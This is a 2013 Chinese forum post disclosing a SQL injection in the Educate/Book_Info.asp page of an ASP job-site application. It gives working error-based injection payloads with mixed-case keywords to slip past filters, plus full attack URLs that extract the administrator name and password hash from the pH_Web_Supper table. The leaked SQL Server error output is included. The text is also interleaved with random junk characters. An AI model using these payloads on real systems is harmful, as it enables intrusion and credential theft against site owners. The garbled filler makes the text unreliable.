漏洞出现在Educate/Book_Info.asp
0 x) F: i$ i2 b/ v$ B+ q1 u# K% T1 T此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
) G ^, D: c3 d+ C7 q7 L" M dexp:如下
6 L) z9 \5 z( G查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% ]' m/ q7 F# [' [2 P8 t/ V查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
. W( a3 A% J6 u- thttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
( r. |4 m; f- R0 d( XMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'5 h7 ` y0 G/ s h" _! m! T2 r: F
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
. C. ?6 G l1 w& `1 y2 ^/Educate/Book_Info.asp,行 85 o4 L, e! C8 B# ]
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% z+ K9 U& x* D. B- D9 q' P% w4 O; k. TMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'* X0 K+ `; I6 B6 {; ^
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。1 H" @1 o2 F1 O! V( ]- N
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对